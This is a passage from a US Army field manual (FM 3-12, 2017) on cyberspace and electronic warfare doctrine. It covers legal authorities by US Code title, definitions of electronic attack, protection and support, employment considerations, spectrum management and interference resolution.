throughout the Army. In this capacity, the chief inform ation officer /G-6 ensures compliance with 47 USC as 
well as other applicable Federal, DOD, and military department EMS governance and policy to minimize 
radio frequency interference at DOD and Service test ranges and installations for activities such as GP S 
testing and EA clearances for training, testing, and evaluating.  
1-99. War and National Defense, USC  Title 50, provides authorities concerning the conduct of both military 
and intelligence activities of the U.S. Government. Intelligence activities conducted by  the U.S. Government 
must be properly authorized, conform to the U.S. Constitution, and be conducted  under presidential authority. 
Executive Order 12333, establishes the framework and organization of the intelligence community as 
directed by the P resident of the United States. For example, the order directs the NSA as the le ad for signals 
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-23 intelligence. DOD policy documents, including D oD Manual 5240.01, “DoD Intell igence Activities,” 
establish DO D policy for the conduct of intelligence operations.  
1-100. The Army strictly limits and controls collection of information on U.S. persons and collection in the 
United States. AR 381 -10 identifies the types, means, and limitations concerning collection retention and 
dissemination of information in the United State s and on U.S. persons. This regulation applies to cyberspace 
within the boundaries of the United States and U.S. persons abroad. Table 1 -2 on page 1 -24 provides  more 
information on authorities in cyberspace.  
  
Chapter 1 
1-24 FM 3-12  11 April 2017 Table 1-2. United States C ode-based authorities 
United 
States 
Code 
(USC)  Title Key Focus  Principal 
Organization  Role in Cyberspace  
Title 6  Domestic 
Security  Homeland Security  Department of 
Homeland Security  Security of U.S. 
government portion of 
cyberspace  
Title 10  Armed 
Forces  National Defense  Department of 
Defense  Man, train, and equip, 
U.S. forces to conduct 
military operations in 
cyberspace  
Title 18  Crimes and 
Criminal 
Procedures  Federal Offenses  Department of Justice  Crime prevention, 
apprehension, and 
prosecution of criminals 
opera ting in cyberspace  
Title 32  National 
Guard National defense and 
DSCA training and 
operations in the U.S.  Army National Guard, 
Air National Guard  Domestic consequence 
management when in a 
Title 32 status  
Title 40  Public 
Buildings, 
Property, and 
Works  Chief Information 
Officer roles and 
responsibilities  All federal 
departments and 
agencies  Establish and enforce 
standards for acquisition 
and security of 
information technologies  
Title 44  Public 
Printing and 
Documents  All federal agencies  All federal 
depa rtments and 
agencies  Information security and 
information resource 
management  
Title 47  Telecom -
munications  All federal agencies  All federal 
departments and 
agencies  Use of the 
electromagnetic 
spectrum  
Title 50  War and 
National 
Defense  A broad spectrum of  
military, foreign 
intelligence, and 
counterintelligence 
activities  Commands, Services, 
and agencies under 
the Department of 
Defense and 
intelligence 
community agencies 
aligned under the 
Office of the Director 
of National 
Intelligence  Secure U.S. interests  by 
conducting military and 
foreign intelligence 
operations in cyberspace  
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-25 SECTION III  – ELECTRONIC WARFARE O PERATIONS  
1-101. This section includes fundamental information about EW including  EA, EP, ES, and considerations 
for employment.  
ELECTROMAGNETIC SPECTRUM OPERATIONS  
1-102. EMSO are comprised of EW and SMO. The importance of the EMS and its relationship to the 
operational capabilities of the Army is the focus of EMSO. EMSO include all activities in military operations 
to successfully control the EMS. Figure 1-8 illustrates EMSO and how they relate to SMO and EW.  
Figure 1-8. Electromagnetic spectrum operations  
ELECTRONIC WARFARE  
1-103. Electronic warfare  refers to military action involving the use of electromagnetic and directed energy 
to control the electromagnetic spectrum or to attack the enemy (JP 3 -13.1) . EW capabilities enable Army 
forces to create conditions and effects in the EMS to support  the co mmander’s intent and concept of 
operations. EW includes EA, EP, and ES and includes activities such as electromagnetic jamming, 
electromagnetic hardening, and signal detection, respectively. EW affects, supports, enables, protects, and 
collects on capabili ties operating within the EMS, including cyberspace capabilities. (See figure 1 -9 on page 
1-26.) With proper integration and deconfliction, EW can create reinforcing and complementary effects by 
affecting devices that operate in and through wired and wirel ess networks.  Throughout this document, the 
term EW operations refers to planning, preparing, execution, and continuous assessment of the electronic 
warfa re activities of an operation. The term EMSO indicates the addition of those operationally related 
spectrum management operations activities.  

Chapter 1  
1-26 FM 3 -12 11 April 2017  Figure 1-9. Electronic warfare missions  
ELECTRONIC ATTACK  
1-104. EA involves the use of electromagnetic energy, directed energy, or anti -radiation weapons to attack 
personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying enemy combat 
capability and is considered a form of fires . EA includes — 
 Actions taken to prevent or reduce an enemy's effective use of the EMS.  
 Employment of weapons that use either electromagnetic or directed energy as their primary 
destructive mechanism.  
 Offensive and defensive activities, including countermeasures.  
1-105. EA includes using weapons that primarily use electromagnetic or directed energy for destruction. 
These can include las ers, radio frequency weapons, and particle beams. Directed energy  is an umbrella term 
covering technologies that relate to the production of a beam of concentrated electromagnetic energy or 

Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-27 atomic or subatomic particles (JP 3 -13.1) . In EW, most directed -energy applications fit into the category of 
EA. A directed -energy weapon uses electromagnetic energy to damage or destroy an enemy's equipment, 
facilities, and /or personnel. In addition to destructive effects, directed -energy weapon systems support area 
denial and crowd control.  
1-106. Army operations use offensive and defensive tasks for EA. Examples of offensive EA include — 
 Jamming electronic command and control or enemy radar systems.  
 Using anti -radiation missiles to suppress enemy air de fenses (anti -radiation weapons use radiated 
energy emitted from a target as the mechanism for guidance onto the target).  
 Using electronic deception to provide false information to  enemy ISR systems.  
 Using directed -energy weapons to deny, disrupt, or destro y equipment or capabilities.  
1-107. Defensive EA  uses the EMS to protect personnel, facilities, capabilities, and equipment. Examples 
include self -protection and other protection measures such as the use of expendables (flares and active 
decoys), jammers, towed decoys, directed -energy infrared countermeasures, and counter radio -controlled 
improvised explosive device systems.  
ELECTRONIC ATTACK ACTIONS  
1-108. Actions related to EA are either offensive or defensive. Though they are similar actions and 
capabilities, they  differ in purpose. Defensive EA protects friendly personnel and equipment or platforms. 
Offensive EA denies, disrupts, or destroys enemy capability. EA actions include — 
 Countermeasures.  
 Electromagnetic deception.  
 Electromagnetic intrusion.  
 Electromagnetic jamming.  
 Electronic probing.  
 Electromagnetic pulse.  
Countermeasures  
1-109. Countermeasures  are that form of military science that, by t he employment of devices and/or 
techniques, has as its objective the impairment of the operational effectiveness of enemy activity (JP 3 -13.1) . 
They can be deployed preemptively or reactively. Devices and techniques used for EW countermeasures 
include elec tro-optical -infrared countermeasures and radio frequency countermeasures.  
1-110. Electro -optical -infrared countermeasures  consist of a device or technique employing electro -
optical -infrared materials or technology that is intended to impair the effectiveness of enemy activity, 
particularly with respect to precision guided weapons and sensor systems (JP 3 -13.1) . Electro -optical -infrared 
countermeasures may use laser jammers, obscurants , aerosols, signature suppressan ts, decoys, pyrotechnics, 
pyrophorics, high -energy lasers, or directed infrared energy countermeasures.  
1-111. Radio frequency countermeasures  are any device or technique employing radio frequency materials 
or technology th at is intended to impair the effectiveness of enemy activity, particularly with respect to 
precision -guided weapons and sensor systems (JP 3 -13.1) . Radio frequency countermeasures can be active 
or passive. Expendable jammers used by aircraft to defend agai nst precision guided surface -to-air missile 
systems are an example of radio frequency countermeasures.  
Electromagnetic Deception  
1-112. Electromagnetic deception  is the deliberate radiation, re -radiation, alteration, suppression,  
absorption, denial, enhancement, or reflection of electromagnetic energy in a manner intended to convey 
misleading information to an enemy or to enemy electromagnetic -dependent weapons, thereby degrading or 
neutralizing the enemy’s combat capability . Type s of electromagnetic deception include manipulative, 
simulative, and imitative. Manipulative involves actions to eliminate revealing, or convey misleading, 
electromagnetic telltale indicators that may be used by hostile forces. Simulative involves actions to simulate 
Chapter 1  
1-28 FM 3 -12 11 April 2017  friendly, notional, or actual capabilities to mislead hostile forces. Imitative introduces electromagnetic energy 
into enemy systems that imitates enemy emissions.  
Electromagnetic Intrusion  
1-113. Electromagnetic intrusion  is the intentional insertion of electromagnetic energy into transmission 
paths in any manner, with the objective of deceiving operators or of causing confusion (JP 3 -13.1) . 
Electromagnetic intrusion is often conducted by inserting false information. This information may consist of 
voice instructions, false targets, coordinates for fire missions, or rebroadcasting prerecorded data 
transmissions.  
Electromagnetic Jamming  
1-114. Electromagnetic jamming  is the deliberate radiation,  reradiation, or reflection of electromagnetic 
energy for the purpose of preventing or reducing an enemy’s effective use of the electromagnetic spectrum, 
and with the intent of degrading or neutralizing the enemy’s combat capability (JP 3 -13.1) . Examples o f 
targets subject to jamming include radios, radars, navigational aids, satellites, and electro -optics.  
Electronic Probing  
1-115. Electronic probing  is intentional radiation designed to be introduced into the devices or systems of 
potential enemies for the purpose of learning the functions and operational capabilities of the devices or 
systems (JP 3 -13.1) . This activity is coordinated through joint or  interagency channels and supported by 
Army forces.  
Electromagnetic Pulse  
1-116. Electromagnetic pulse  is the electromagnetic radiation from a strong electronic pulse, most 
commonly caused by a nuclear explosion that may couple with electrical or electronic systems to produce 
damaging current and voltage surges (JP 3 -13.1) . An electromagnetic pulse induces high currents and 
voltages in the target system, damaging electrical equipment or disrupting its function. An indirect effect of 
an electromagnetic pulse can be electrical fires caused by the heating of electrical components.  
ELECTRONIC PROTECTION  
1-117. EP involves  actions taken to protect personnel, facilities, and equipment from any effects of friendly 
or enemy use of the EMS  that degrade, neutralize, or destroy friendly combat capability. For example, EP 
includes actions taken to ensure friendly use of the EMS, such as frequency agility in a radio or variable pulse 
repetition frequency in radar. Commander s should avoid confusing EP with self -protection. Both defensive 
EA and EP protect personnel, facilities, capabilities, and equipment. However, EP protects from the effects 
of EA (friendly and enemy) and electromagnetic interference, while defensive EA pri marily protects against 
lethal attacks by denying enemy use of the EMS to guide or trigger weapons.  
1-118. During operations, EP includes, but is not limited to, the application of training and procedures for 
countering enemy EA. Army commanders and forces unders tand the threat and vulnerability of friendly 
electronic equipment to enemy EA and take appropriate actions to safeguard friendly combat capability from 
an exploitation and attack. EP measures minimize the enemy's ability to conduct ES and EA operations 
successfully against friendly forces. To protect friendly combat capabilities, units — 
 Regularly brief friendly force personnel on the EW threat.  
 Safeguard electronic system capabilities during exercises and pre -deployment training.  
 Coordinate and deconflict EMS usage.  
 Limit the EMS signature s to reduce adversary ability to locate nodes.  
 Provide training during routine home station planning and training activities on appropriate EP 
active and passive measures under normal conditions, conditions of threat EA, o r otherwise 
degraded networks and systems.  
 Take appropriate actions to minimize the vulnerability of friendly receivers to enemy jamming 
(such as reduced power, brevity of transmissions, and directional antennas).  
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-29  Ensure redundancy in systems is maintained  and personnel are well -versed in switching between 
systems.  
1-119. EP also includes spectrum management. A spectrum manager works for the assistant chief of staff, 
signal G-6 (S-6) and for the cyberspace planner in the CEMA Section. The spectrum manager is  key in the 
coordination and deconfliction of spectrum resources allocated to the force. Spectrum managers or their direct 
representatives participate in the planning for EW operations.  
1-120. The development and acquisition of communications and EMS dependent sy stems includes EP 
requirements to clarify performance parameters. Army forces design their equipment to limit inherent 
vulnerabilities. If EA vulnerabilities are detected, then units must review these programs. (See DODI  4650.01  
for information on the cert ification of spectrum support and electromagnetic compatibility.)  
ELECTRONIC PROTECTION ACTIONS  
1-121. There are several actions related to EP. They include — 
 Electromagnetic compatibility.  
 Electromagnetic hardening.  
 Electronic masking.  
 EMS management.  
 Emission co ntrol.  
 Wartime reserve modes.  
Electromagnetic Compatibility  
1-122. Electromagnetic compatibility  is the ability of systems, equipment, and devices that use the 
electromagnetic spectrum to operate in their intended environments without causing or suffering 
unacceptable or unintentional degradation because of electromagnetic radiation or response (JP 3 -13.1) . It 
involves the application of sound EMS management; system, equipment, and device design configuration 
that ensures interference -free operation. It also involves clear concepts and doctrines that maximize 
operational effectiveness.  
Electromagnetic  Hardening  
1-123. Electromagnetic hardening  consists of action taken to protect personnel, facilities, and/or equipment 
by blanking, filtering, attenuating, grounding, bonding, and/or shielding against undesirable effects of 
electromagnetic energy (JP 3 -13.1) . Electromagnetic hardening is accomplished by using a comprehensive 
shielding of sensitive components and by using non -electrical channels for the transfer of data and power.  
Electromagnetic Spectrum Management  
1-124. Electromagneti c spectrum management  is planning, coordinating, and managing use of the 
electromagnetic spectrum through operational, engineering, and administrative procedures (JP 6 -01). The 
objective of spectrum management is  to enable electronic systems to perform their functions in the intended 
environment without causing or suffering unacceptable interference.  
Electronic Masking  
1-125. Another task of electronic protection is electronic masking.  Electronic masking  is the controlled 
radiation of electromagnetic energy on friendly frequencies in a manner to protect the emissions of friendly 
communications and electronic systems against enemy electronic warfare support measures/ SIGINT  without 
significantly d egrading the operation of friendly systems (JP 3 -13.1) . 
Emission Control  
1-126. Emission control  is the selective and controlled use of electromagnetic, acoustic, or other emitters 
to optimize command and control capabilities while minimizing, for operations security: a. detection by 
enemy sensors;  b. mutual interference among friendly systems; and/o r c. enemy interference with the ability 
Chapter 1  
1-30 FM 3 -12 11 April 2017  to execute a military deception plan (JP 3 -13.1) . Emission control prevents the enemy from detecting, 
identifying, and locating friendly forces. It is also used to minimize electromagnetic interference among 
friendl y systems.  
Wartime Reserve Modes  
1-127. Wartime reserve modes  are characteristics and operating procedures of sensors, communications, 
navigation aids, threat recognition, weapons, and countermeasures systems that will contribute to military 
effectiveness if unknown to or misunderstood by opposing commanders before they are used, but could be 
exploited or neutralized if known in advance (JP 3 -13.1) . Wartime reserve modes are deliberately held in 
reserve for wartime or emergency use an d seldom  employed outside  of conflict . 
ELECTRONIC WARFARE SUPPORT  
1-128. ES involv es actions tasked by, or under direct control of, an operational commander to search for, 
intercept, identify, and locate or localize sources o f intentional and unintentional radiated electromagnetic 
energy for the purpose of immediate threat recognition, targeting, planning, and conduct of future operations 
ES enables U.S. forces to identify the electromagnetic vulnerability of an enemy’s or adversary’s electronic 
equipment and systems. Friendly forces take advantage of these vulnerabilities through EW operations.  
1-129. ES systems are a source of information for immediate decisions involving EA, EP, avoidance, 
targeting, and other tactical employment o f forces. ES systems collect data and produce information to — 
 Corroborate other sources of information or intelligence.  
 Conduct or direct EA operations.  
 Create or update EW databases.  
 Initiate self -protection measures.  
 Support EP efforts.  
 Support informati on related capabilities.  
 Target enemy or adversary systems . 
1-130. ES and SIGINT  missions may use the same or similar resources. The two differ in the intent , the 
purpose for the task, the detected information’s intended use, the degree of analytical effort expended, the 
detail of information provided, and the timelines required. ES missions respond to the immediate 
requirements of a tactical commander  or to develop information to support future cyberspace or EW 
operations . (See ADRP 2 -0 and FM 2 -0 for more i nformation on SIGINT .) 
ELECTRONIC WARFARE SUPPORT ACTIONS  
1-131. There are several actions related to ES. They include — 
 Electronic intelligence.  
 Electronic reconnaissance.  
 Electronics security.  
Electronic Intelligence  
1-132. Electronic intelligence  is technical and geolocation intelligence derived from foreign 
noncommunications electromagnetic radiations emanating from other than nuclear detonations or radioactive 
sources  (JP 3 -13.1) . Electronic  intelligence is a subcomponent of SIGINT . Examples of noncommunications 
electromagnetic radiations include radars, surface -to-air missile systems, and aircraft.  
Electronic Reconnaissance  
1-133. Electronic reconnaissance  is the d etection, location, identification, and evaluation of foreign 
electromagnetic radiations (JP 3 -13.1) . Electronic reconnaissance is used to update and maintain the threat 
characteristics information. The threat electronic characteristics information is used  in the planning and 
integrating processes.  
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-31 Electronics Security  
1-134. Electronics security  is the protection resulting from all measures designed to deny unauthorized 
persons information of value that might be derived from their interception and study of noncom munications 
electromagnetic radiations, e.g., radar (JP 3 -13.1) . Examples of electronics security are EMS mitigation and 
network protection.  
Note . See JP 3 -13.1 and ATP 3 -36 for additional information on EW capabilities, tasks , and 
techniques.  
ELECTROMAGNETIC INTERFERENCE  
1-135. Electromagnetic interference  is any electromagnetic disturbance, induced intentionally or 
unintentionally, that interrupts, obstructs, or otherwise degrades or limits the effective performan ce of 
electronics and electrical equipment (JP 3 -13.1) . It can be induced intentionally, as in some forms of EW, or 
unintentionally, because  of spurious emissions and responses, intermodulation products, and other similar 
products.  
ELECTRONIC WARFARE REPRO GRAMMING  
1-136. Electronic warfare reprogramming  is the deliberate alteration or modification of electronic warfare 
or target sensing systems, or the tactics and procedures that employ them, in response to validated change s 
in equipment, tactics, or the electromagnetic environment (JP 3 -13.1) . These changes may be the result of 
deliberate actions on the part of friendly, enemy, adversary, third parties , or they may be brought about by 
electromagnetic interference or other i nadvertent phenomena. The purpose of EW reprogramming is to 
maintain or enhance the effectiveness of EW and target sensing system equipment. Electronic warfare 
reprogramming includes changes to self -defense systems, offensive weapons systems, ES, and intel ligence 
collection systems.  Joint and  multinational coordination of S ervice reprogramming efforts ensures friendly 
forces consistently identify, process, and implement reprogramming requirements. (For more information on 
EW reprogramming, see ATP 3 -13.10.)  
EMPLOYMENT CONSIDERA TIONS  
1-137. EW has specific ground -based, airborne, and functional (EA, EP, or ES)  employment considerations. 
The electronic warfare officer (EWO) ensures EW -related employment considerations are pro perly 
articulated early in the operations process. Each capability employed has certain advantages and 
disadvantages  which are considered during the course of action development in the MDMP  before selecting 
the best course of action . The staff plans for these before executing EW operations.  
GROUND -BASED ELECTRONIC WARFARE CONSIDERATIONS  
1-138. Ground -based EW capabilities support the commander’s scheme of maneuver. Ground -based EW 
equipment can be employed by a di smounted Soldier or on highly mobile platforms. Due to the short -range 
nature of tactical signals direction finding, EA assets are normally located in the forward areas of the 
battlefield, with or near forward units.  
1-139. Ground -based EW capabilities have certa in advantages. They provide direct support to maneuver 
units (for example, through counter -radio -controlled improvised  explosive  device  and communications  or 
sensor jamming). Ground -based EW capabilities support continuous operations and respond quickly to  EW 
requirements of the ground commander. To maximize the effectiveness of ground -based EW capabilities, 
maneuver units must  understand the associated EMS signature and protect EW assets from enemy ground 
and aviation threats. EW equipment should be as sur vivable and mobile as the force it supports. Maneuver 
units must logistically support the EW assets, and supported commanders must clearly identify EW 
requirements.  
Chapter 1  
1-32 FM 3 -12 11 April 2017  1-140. Ground -based EW capabilities have certain limitations. They are vulnerable to enemy attack and can 
be masked by terrain. They are vulnerable to enemy geolocation, electromagnetic deceptive measures , and 
EP actions. In addition, they have distance or propagation limitations against enemy electronic systems.  
AIRBORNE ELECTRONIC WARFARE CONSIDERATI ONS 
1-141. While ground -based and airborne EW planning and execution are similar, they significantly differ 
in their EW employment time. Airborne EW operations are perform ed at much higher speeds and generally 
have a shorter duration than ground -based operations. The timing of airborne EW support requires detailed 
planning.  
1-142. Airborne EW requires the following — 
 A clear understanding of the supported commander’s EW objectives.  
 Detailed planning and integration.  
 Groun d support facilities.  
 Liaisons between the aircrews of the aircraft providing the EW support and the aircrews or ground 
forces being supported.  
 Protection from enemy aircraft and air defense systems.  
1-143. Airborne EW capabilities have certain advantages. They c an provide direct support to other tactical 
aviation missions such as suppression of enemy air defenses, destruction of enemy air defenses, and 
employment of high -speed anti -radiation missiles. They can provide extended range over ground -based 
assets. Airb orne EW capabilities can provide greater mobility and flexibility than ground -based assets. In 
addition, they can support ground -based units in beyond line -of-sight operations.  
1-144. The various airborne EW assets have different capabilities. The limitations associated with airborne 
EW capabilities are — 
 Time-on-station . 
 Vulnerability to enemy EP actions . 
 Electromagnetic deception techniques . 
 Geolocation  by enemy and adversary forces . 
 Limited assets (support from nonorganic EW platforms need to be requested).  
ELECTRONIC ATTACK CONSIDERATIONS  
1-145. EA includes both offensive and defensive  activities. These activities differ in their purpose. 
Defensive EA protects friendly personnel and equipment or platforms. Offensive EA denies, disrupts, or 
destroys enemy  or adversa ry capability. Considerations for planning or employing EA include — 
 Integration with the scheme of maneuver and other effects.  
 Persistency of effect.  
 Intelligence collection.  
 Friendly communications.  
 EMS signatures  allowing enemy and adversary  geolocation, and targeting  by threat s. 
 Non-hostile local EMS use.  
 Hostile intelligence collection.  
1-146. The EWO ; the assistant chief of staff, intelligence ( G-2/S-2); the assistant chief of staff, operations  
G-3 (S-3); G-6 (S-6); the spectrum manager ; and the IO officer coordinate closely to avoid friendly 
communications interference that can occur when using EW systems on the battlefield. Coordination ensures 
that EA systems frequencies are properly deconflicted with friendly com munications and intelligence 
collection systems or that ground maneuver and friendly information tasks are modified accordingly.  
1-147. The number of information systems, EW systems, and sensors operating simultaneously on the 
battlefield makes deconfliction with  communications systems a challenge. The EWO, the G -2 (S-2), the G -
6 (S-6), and the spectrum manager plan and rehearse deconfliction procedures to quickly adjust their use of 
EW or communications systems.  
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-33 1-148. EA operations depend on EW support and intelligence , especially  SIGINT  to provide targeting 
information and battle damage assessment. However, not all intelligence collection is focused on supporting 
EW. If not properly coordinated with the G -2 (S-2) staff, EA operations may impact intelligence collection 
significantly deterring the ability to answer information requirements. In situations where a known conflict 
between the intelligence collection effort and the use of EA exists, the EW working group brings the problem 
to the G -3 (S-3) for resolution.  
1-149. EA su pports unified land operations. Integrating EA with the scheme of maneuver is critical to 
ensure units fully exploit the effects delivered agai nst enemy or adversary forces. The limited duration of 
these effects require close coordination and synchronizati on between EW assets  and forces and the supported 
maneuver forces.  
1-150. Other operations rely on the EMS. For example, a given set of frequencies may be used for IO to 
broadcast messages or cyberspace operations for wireless communications. In both examples, th e use of EA 
could unintentionally interfere with such operations if not properly coordinated. To ensure EA does not 
negatively impact planned operations, the EWO coordinates between fires, DODIN operations, and other 
functional or integrating sections, as required.  
1-151. EA can adversely affect local media, communications systems, and infrastructure. Planners should 
consider unintended consequences of EW operations and deconflict these operations with the various 
functional or integrating cells. For example, frie ndly jamming could potentially deny the functioning of 
essential services such as ambulance or fire fighters to a local population. EWOs routinely synchronize EA 
with the other functional or integrating cells responsible for the information tasks. In this way, they ensure 
that EA efforts do not cause fratricide or unacceptable collateral damage to their intended effects.  
1-152. The potential for hostile intelligence collection also affects EA. An enemy  or adversary  can detect 
friendly EW capabilities and thus gain  intelligence on friendly force intentions. For example, the frequencies 
Army forces jam could indicate where they believe the enemy’s capabilities lie. The EWO and the G -2 (S-
2) develop an understanding of the enemy’s collection capability. Along with the  red team (if available), they 
determine what the enemy might gain from friendly force use of EA. A red team  is an organizational element 
comprised of trained and educated members that provide an independent capability to fully explore 
alternatives in plan s and operations in the context of the operational environment and from the perspective 
of enemies, adversaries , and others (JP 2 -0). 
1-153. The primary effects of jamming only persist when  the jammer is within range of the target and 
emitting. Secondary and tert iary effects of jamming are evident in the actions of the enemy or adversary 
following the EA mission.  
ELECTRONIC PROTECTION CONSIDERATIONS  
1-154. EP is achieved through physical security, communications security measures, system technical 
capabilities (such as frequency hopping and shielding of electronics), spectrum management, and emission 
control procedures. The EW working group must consider the following key functions when planning for EP 
operations — 
 Vulnerability analysis and assessment.  
 EP measures  and how they affect friendly capabilities.  
Vulnerability Analysis and Assessment  
1-155. Vulnerability analysis and assessment is the basis for formulating EP plans. The Defense 
Information Systems Agency conduct s vulnerability analysis and assessment, focusing on automated 
information systems.  
Electronic Protection Measures Affects  
1-156. EP include s any measure taken to protect the force from hostile EA. EP measures can also limit 
friendly capabilities or operations. For example, denying frequency usage to counter -radio -controlled 
improvised -explosive -device EW systems on a given frequency to preser ve it for a critical friendly 
information system could leave friendly forces vulnerable to certain radio -controlled improvised explosive 
Chapter 1  
1-34 FM 3 -12 11 April 2017  devices. The EWO and the G -6 (S-6) carefully consider these second -order effects when advising the G -3 
(S-3) regarding EP measures.  
ELECTRONIC WARFARE SUPPORT CONSIDERATIONS  
1-157. Whether an asset is performing a SIGINT  or EW support mission depends on mission purpose and 
intent . Operational commanders task assets to conduct EW s upport for the purpose of immediate threat 
recognition, targeting, future plans, and other tactical actions. The EWO coordinates with the G -2 (S-2) to 
ensure EW support needed for planned EW operations is identified and submitted to the G -3 (S-3) for 
comma nder approval. In cases where EA actions may conflict with the G -2 (S-2) intelligence collection 
efforts, the G -3 (S-3) or commander decides which has priority. The EWO and the G -2 (S-2) develop a 
structured process within each echelon for conducting this intelligence gain -loss calculus during mission 
rehearsal, exercises, and pre -deployment preparation , providing the commander with the intelligence and 
operational gain -loss considerations in order to enable a decision on which activity to prioritize.  
ELECT RONIC WARFARE REPROGRAMMING CONSIDERATIONS  
1-158. EW reprogramming refers to modifying friendly EW or target sensing systems in response to 
validated changes in enemy equipment and tactics or the electromagnetic environment. Each Service or 
organization is responsible for its respective EW reprogramming support programs. During joint operations, 
swift identification and reprogramming efforts are critical in a rapidly evolving hostile situation. The  key 
consideration for EW reprogramming is joint coordination. (For more information on EW reprogramming, 
see ATP 3 -13.10 .) 
SPECTRUM MANAGEMENT  
1-159. Spectrum management is the operational, engineering, and administrative procedures t o plan, 
coordinate, and manage use of the electromagnetic spectrum  and enabl es cyberspace, signal and EW 
operations . Spectrum management includes frequency management, host nation coordination, and joint 
spectrum interference resolution. Spectrum managemen t enables spectrum -dependent capabilities and 
systems to function as designed without causing or suffering unacceptable electromagnetic interference. 
Spectrum management provides the framework to utilize the electromagnetic spectrum in the most effective 
and efficient manner through policy and procedure.  
SPECTRUM MANAGEMENT OPERATIONS FUNCTIONS  
1-160.  SMO are the interrelated functions of spectrum management, frequency assignment, host nation 
coordination, and policy that together enable the planning, management,  and execution of operations within 
the electromagnetic operational environment during all phases of military operations. The SMO functional 
area is ultimately responsible for coordinating EMS access among civil, joint, and multinational partners 
throughou t the operational environment. The conduct of SMO enables the commander’s effective use of the 
EMS. The spectrum manager at the tactical level of command is the commander’s principal advisor on all 
spectrum related matters.  
1-161. The conduct of SMO enables and s upports the execution of cyberspace operations and EW. SMO 
are critical to spectrum dependent devices such as air defense radars, navigation, sensors, EMS using 
munitions, manned and unmanned systems of all types (ground and air, radar, sensor), and all ot her systems 
that use the EMS. The overall objectives of SMO are to enable these systems to perform their functions in 
the intended environment without causing or suffering unacceptable electromagnetic interference.  
1-162. SMO are normally performed by trained spectrum  managers from the battalion through Army 
component level. SMO are largely hierarchal processes. SMO requirements are requested from lower 
echelons, but EMS resources are allocated from higher echelons.  
1-163. Understanding the SMO process in planning, mana ging, and employing EMS resources is a critical 
enabler for cyberspace and EW operations . SMO provides the resources necessary for the implementation of 
the wireless portion of net -centric warfare (see ATP 6 -02.70).  
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-35 ELECTRONIC WARFARE COORDINATION  
1-164. The spec trum manager should be an integral part of all EW planning . The SMO assists in the 
planning of EW operations by providing expertise on waveform propagation, signal , and radio frequency 
theory  for the best employment of friendly  communication  systems to support the commander’ s objectives.  
The advent of common user “jammers” has made this awareness and planning critical for the spectrum 
manager. In addition to jammers, commanders and staffs must consider non -lethal weap ons that use 
electromagnetic radiation. Coordination for EW will normally occur  in the CEMA section . It may occur  in 
the EW cell if it is operating under a joint construct or operating at a special echelon . 
1-165. Although in some respects the functions of the EWO and the spectrum manager appear similar, they 
differ in that the spectrum manager is concerned with the proper operation of friendly spectrum dependent 
devices, while the EWO is the expert on threat  EW capabilities and their effects on operations and works to 
protect the EMS for friendly forces while de nying the enemy use of the EMS.  
FREQUENCY INTERFERENCE RESOLUTION  
1-166. Interference is the radiation, emission, or indication of electromagnetic energy (either in tentionally 
or unintentionally ) causing degradation, disruption, or complete obstruction of the designated function of the 
electronic equipment affected. The reporting end user is responsible for assisting the spectrum man ager in 
tracking, evaluating, and resolving interference. Interference resolution is performed by the spectrum 
manager at the echelon receiving the interference. The spectrum manager is the final authority for 
interference resolution. For interfere nce affecting satellite communications, the Commander, Joint 
Functional Component Command for Space is the supported commander and final authority of satellite 
communications interference. (For more information on satellite communications interference,  see Strategic 
Instruction 714 -04.) 
1-167. Interference may come from signal devices (such as unintentional friendly and unfriendly radios and 
radars) and from non -signal devices (such as welders or vehicle engines). The skill level of systems operators 
and maintenan ce personnel can mean the difference between a minor inconvenience and complete system 
disablement.  
1-168. When experiencing harmful interference, the operator should be able to discern whether the 
interference is coming from natural phenomena or man -made sources . If natural phenomena is the cause, the 
operator should try to work through the interference. An alternate frequency may be assigned if the 
interference persists. If the operator suspects man -made interference, ensure an internal equipment check  is 
conduc ted to exclude equipment malfunctions. Improper alignment, degraded components, antenna 
disorientation, or poor maintenance is usually the cause of interference. After the operator has ruled out 
internal causes, a check with other friendly units in the are a may reveal incompatibilities between operations.  
1-169. If a compromise cannot be worked out between the units, the case is referred to the spectrum 
manager at the next higher echelon. The spectrum manager will conduct an analysis of the database, a site 
survey  (if possible), and coordinate with other units in the vicinity to identify the cause of the interference. 
If the spectrum manager is unable to isolate the cause of the interference, the spectrum manager will submit 
a report to the next spectrum management  level for resolution. For interference affecting satellite 
communications, a joint spectrum interference resolution report will be generated according to  CJCSM 
3320.02  D. 
This page intentionally left blank.   
 
11 April 2017  FM 3 -12 2-1 Chapter 2   
Relationships with Cyberspace and the Electromagnetic 
Spectrum  
This chapter provides information on operations and missions that use cyberspace and 
the electromagnetic spectrum . These operations and actions may affect cyberspace, the 
electromagnetic spectrum , cyberspace operations, and electronic warfare operations. 
Commanders and staffs integrate and synchronize cyberspace operations with these 
during all phases of operations.  
INTERDEPENDENCIES  
2-1. Cyberspace and EW operations are conducted to  support Army operations and missions. This support 
provides methods for other operations such as signal, IO, intelligence, and space to enable or utilize 
cyber space and EW operations  to execute their core missions . The associated staff elements  are more directly 
involved in planning or facilitating cyberspace capabilities than other staff functions. The results of actions 
from these operations affect all aspect s of operations to include mission command and freedom of maneuver 
in cyberspace , and use of the EMS.  
2-2. Commanders and staffs consider how other operations affect  or utilize  cyberspace  and the EMS . 
Actions in cyberspace and the EMS may impact other operations , functions, missions, and tasks as well. The 
broad impact of cyberspace and EW operations must be considered when planning and conducting 
operations.  
INFORMATION OPERATIO NS 
2-3. Information operations  is the integrated employment, during military operations, of information -
related capabilities  (IRC)  in concert with other lines of operation to influence, disrupt, corrupt, or usurp the 
decision making of enemies and adversaries while protecting our own  (JP 3 -13). IO synchr onizes IRC s, in 
concert with operations, to create effects in and through the information environment  inclusive of cyberspace . 
IRC advance the commander's intent and concept of operations; seize, retain, and exploit the initiative in the 
information enviro nment ; and consolidate gains in the information environment , to achieve a decisive 
information advantage over the threat. Because cyberspace is fully part of the information environment , 
